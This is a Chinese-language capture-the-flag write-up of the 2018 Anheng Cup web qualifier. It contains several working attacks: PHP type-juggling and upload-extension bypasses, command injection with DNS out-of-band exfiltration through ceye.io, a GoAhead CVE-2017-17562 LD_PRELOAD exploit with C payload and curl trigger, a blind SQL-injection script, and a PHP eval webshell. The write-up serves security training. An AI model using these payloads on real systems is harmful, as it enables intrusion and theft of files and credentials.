保证您更舒适的阅读体验和持续更新，本文已转移至我的个人博客，请您访问http://anemone.top/以确保您阅读的文章是最新版本，以及看到新的文章

2018“安恒杯”WEB安全测试秋季资格赛，被老板批评“只会写文档的黑客”后，赶快刷几题找回点自信Orz。

奇怪的恐龙特性

进入靶机，可以看到网页源码

<?php 
highlight_file(__FILE__); 
ini_set("display_error", false);  
error_reporting(0);  
$str = isset($_GET['A_A'])?$_GET['A_A']:'A_A'; 
if (strpos($_SERVER['QUERY_STRING'], "A_A") !==false) { 
    echo 'A_A,have fun'; 
} 
elseif ($str<9999999999) { 
    echo 'A_A,too small'; 
} 
elseif ((string)$str>0) { 
    echo 'A_A,too big'; 
} 
else{ 
    echo file_get_contents('flag.php'); 
     
} 

 ?> A_A,too small

首先要绕过isset($_GET['A_A']) && strpos($_SERVER['QUERY_STRING'], "A_A")，表面上说我们需要生成一个GET请求并且参数为A_A，但是第二个判断有要求GET请求的参数不能为A_A，看起来这是不可能的，但是由于PHP特性，会自动替换.为_，因此我们可以构造 http://ip/?A.A=xxx来绕过这个判断。

接着我们需要绕过后面两个对str<9999999999 || (string)str为一个数组，由于类型不同无法判断/强制转化，因此这样两个判断就都不成立了，这样我们就可以开心的getflag了。最后的GET请求为http://114.55.36.69:8022/?A.A[]=1

ping也能把你ping挂

0x01

进入靶机，跳转到ping的页面，猜测有命令注入的问题

1537705876135.png

尝试后发现;，空格被过滤，并且长度存在限制，这样我们只能用ls先看下当前目录有啥东西了：

1537705979278.png

这里我们发现了上传入口：you_find_upload.php。

0x02

进入http://114.55.36.69:6664/you_find_upload.php，看到可以查看源码，那就点进去查看吧

1537706140903.png

前面那一串数字先不管，将后面的base64解码，得到上传的源代码：

<?php
$type = array('gif','jpg','png');
mt_srand((time() % rand(1,100000)%rand(1000,9000)));
echo mt_rand();
if (isset($POST['submit'])) {
    $check = getimagesize($FILES'file');
    @$extension = end(explode('.',$FILES'file'));
    if(in_array($extension,$type)){
        echo 'File is an image - ' . $check['mime'];
        $filename = mt_rand().''.$FILES'file';
        move_uploaded_file($FILES'file', $filename);
        echo "<br>\n";
    } else {
        echo "File is not an image";
    }
}
if(isset($GET['p'])){
    if(@preg_match("/..\//",$GET['p'])){
        echo "你这个孩子，too young too simple";
    }
    else{
       @include $_GET['p'].".php";
    }
}
?>

0x03

首先我们需要绕过文件类型限制，in_array($extension,$type)表示我们得上传后缀是gif，jpg或png的文件，这里复习一下上传绕过的普通套路：

1. Apache

   1.php.jpg #从apache从右往左，直到可解析的文件后缀

2. Nginx

   1.php%001.jpg #00处截断

3. IIS

   a.asp;jpg

   a.php. 和a.php[空格] #会自动去掉空格

注意到这里用的是Apache容器，那我们就上传个backdoor.php.jpg文件就好了

1537706584108.png

看到这里我们已经上传成功了

0x04

接下来我们需要确定上传后的文件名，再次查看源码，点击上传后，程序首先使用mt_srand((time() % rand(1,100000)%rand(1000,9000)));设置了随机数种子，并且打印第一个随机数echo mt_rand();；而上传文件名就是第二个随机数+原本文件名$filename = mt_rand().''.$FILES'file';，这样的伪随机数是存在问题的，我们可以根据第一个随机数暴力破解出随机数种子（注意到这里的种子∈[1000,9000]），然后再计算出第二个随机数。

以第3步的上传结果为例，使用php_mt_seed.exe计算出随机数种子为5240.

λ php_mt_seed.exe 823735129
Found 0, trying 0 - 33554431, speed 0 seeds per second
seed = 5240
Found 1, trying 67108864 - 100663295, speed 71014670 seeds per second

接着推测出第二个随机数：

λ cat test.php
<?php
mt_srand(5240);
echo mt_rand();
echo "\n";
echo mt_rand();
?>
λ php test.php
823735129
288373614

那么我们的文件名就是288373614_backdoor.php.jpg

后面就可以连菜刀http://114.55.36.69:6664/upload/288373614_backdoor.php.jpg，flag在根目录

1537707585778.png

ping

这题算是看着答案做出来的，不过思路很好，用到了DNS带外数据的知识，这里也记录一下：

0x01

首先还是扫描网站，可以看到网站泄露了一个robots.txt文件

1537792801839.png

访问该文件，看到目录下存在index.txt，where_is_flag.php文件

1537792801839.png

先看index.txt:

<?php include("where_is_flag.php");echo "ping";$ip =(string)$_GET['ping'];$ip =str_replace(">","0.0",$ip);system("ping  ".$ip);

可以看到存在命令执行，ping参数会直接拼接在ping命令后

where_is_flag.php我们需要用命令执行才能看了。

0x02

尝试使用http://114.55.36.69:8015/?ping=127.0.0.1，发现网站未响应，这是因为后台正在循环ping，说明了命令执行成功。

接着尝试使用http://114.55.36.69:8015/?ping=-c 1 127.0.0.1，可以发现网站网站后台并没有回显ping的结果，这说明虽然网站执行了命令，但是并不返回命令执行结果。

那么如何拿到命令执行结果呢？第一个想到的是使用http请求，比如说wget www.mysite.com/$(cat flag.php)，但是尝试后发现无效，这可能是服务器并没有wget命令。

正解是使用dns解析获取带外数据，这里推荐一个平台：http://ceye.io，登录之后可以获得一个专属的地址（假设为qwerty.ceye.io），那么如果我们<code>ping `whoami`.qwerty.ceye.io</code>，由于ping的第一步是dns解析，所以在http://ceye.io/records/dns就可以看whoami命令执行的结果：

1537793445399.png

根据上述原理，我们可以获取where_is_flag.php，但是如果文件内容中有空格，我们的ping命令就不能执行了，所以用sed命令将空格换成sspacee。这样我们ping参数为：
<code>http://114.55.36.69:8015/?ping= `cat where_is_flag.php|sed 's/\s/sspacee/g'`.0ri9zr.ceye.io</code>

同时在ceye中可以看到文件内容了

1537792741495.png

接着访问dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php，如法炮制即可：

<code>http://114.55.36.69:8015/?ping= `cat dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php|sed 's/\s/sspacee/g'`.0ri9zr.ceye.io</code>

可以看到flag：

1537793298457.png

拓展： 不止是命令执行，dns的带外数据还能传很多东西比如说SQL注入、XXE，详细可以看http://ceye.io/payloads，Github上也有了利用该方法进行SQL注入的工具（https://github.com/ADOOO/DnslogSqlinj)

ProxyError

修改Host:192.168.5.132

新瓶装旧酒

0x01 代码审计+文件上传

这里可以看到需要上传一个zip文件：

1539350142198.png

这里看到zip文件中需要包含一个图片后缀：

1539350155700.png

根据apache的特性，使用大马1.pHp.png(注意到文件名不能有.ph)，并且压缩成zip上传，发现flag.php。

1539350804776.png

GOGOGO

0x01 GoAhead CVE-2017-17562

实际上腾讯的“开源Web服务器GoAhead漏洞CVE-2017-17562分析“ 一文已经对此漏洞进行了详细解释，这里只概括的说一下：

1. 因为cgiHandler的过滤不当，导致LD_PRELOAD变量可控，而程序会读取LD_PRELOAD变量记录的文件路径并且执行文件代码；
2. launchCgi函数调用系统函数dup2()将stdin文件描述符指向了POST请求数据对应的临时文件。

从发送payload的命令可以看到，我们的POST中控制了两个输入，一个是LOAD_PRELOAD参数（将它设置为了/proc/self/fd/0），一个是POST的data（将它设置为了我们编译生成的动态链接库）。/proc/self/fd/0 是Linux的伪文件系统文件，实际上指的是stdin，以下命令的执行结果可以说明这一点：

1538571783966.png

这样结合第一条，即程序会从我们标准输入中取代码执行，又因为第二条，我们的标准输入被定向到了POST的临时文件中，具体来说，即定向到了我们的payload.so文件上，这样整个原理就走通了。

0x02 复现CVE

准备payload

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

static void before_main(void) __attribute__((constructor));
static void before_main(void) {
    /* printf("hello, payload executed.\n"); */
    system("cat /var/www/goahead/cgi-bin/hello.cgi");

}

编译

$ gcc -shared -fPIC ./payload.c -o payload.so

触发payload

$ curl -X POST --data-binary @payload.so http://114.55.36.69:8018/cgi-bin/hello.cgi?LD_PRELOAD=/proc/self/fd/0 -i
HTTP/1.1 200 OK
Server: GoAhead-http
Date: Fri Oct 12 13:38:48 2018
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
#!/usr/bin/perl
print "Content-Type: text/html\n\n";
print "Hello GOGOGO";
#flag{ef9f1f880e1f001bedd32bfc52674128}
#!/usr/bin/perl

curl: (56) Illegal or missing hexadecimal sequence in chunked-encoding

进击的盲注

0x01 敏感信息泄露

扫描存在robots.txt

1539405059283.png

0x02 SQL盲注

看源码，username处存在注入，过滤符号"(",")"

1539405263908.png

使用regexp binary注入：

burp0_url = "http://114.55.36.69:6663/index.php"
burp0_headers = {
    "Cache-Control": "max-age=0",
    "Origin": "http://114.55.36.69:6663",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3377.1 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Referer": "http://114.55.36.69:6663/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close"}

result = ''
payload = "admin' and password regexp binary '^{res}'#"
for i in xrange(0,50):
    for j in xrange(32,126):
        if chr(j) in ['*','\\','/','(',')','+','.','?','[',']','^']:
            continue
        hh = payload.format(res=result+chr(j)
        print hh

        burp0_data = {"username": hh, "password": "admin"}
        zz = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        #print zz.content
        if 'password error!' in zz.content:
            result += chr(j)
            print result
            break

得到：dVAxMEBkX25Fdy5waHA=$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

base64解码后得到uP10@d_nEw.php

0x03 文件上传绕过

访问看到一个上传界面

shangchuan

传大马，发现根目录下存在flag：

1539405664157.png

艰难的Bypass之路

非正常解法

扫描到上传目录

1539347922000.png

0x01 发现dalao留的后门

http://114.55.36.69:6663/uploads/

0x02 直接用大佬的后门

以a.php;.jpg为例，查看后门密码

<script language="pHp">@eval($_POST['sb'])</script>

菜刀连接，查看flag

/flag

或者大马http://114.55.36.69:6663/uploads/shell.php.jpg 密码admin

注：题目和payload已上传至GitHub：https://github.com/Anemone95/ctf_wp/tree/master/mooctest2018pre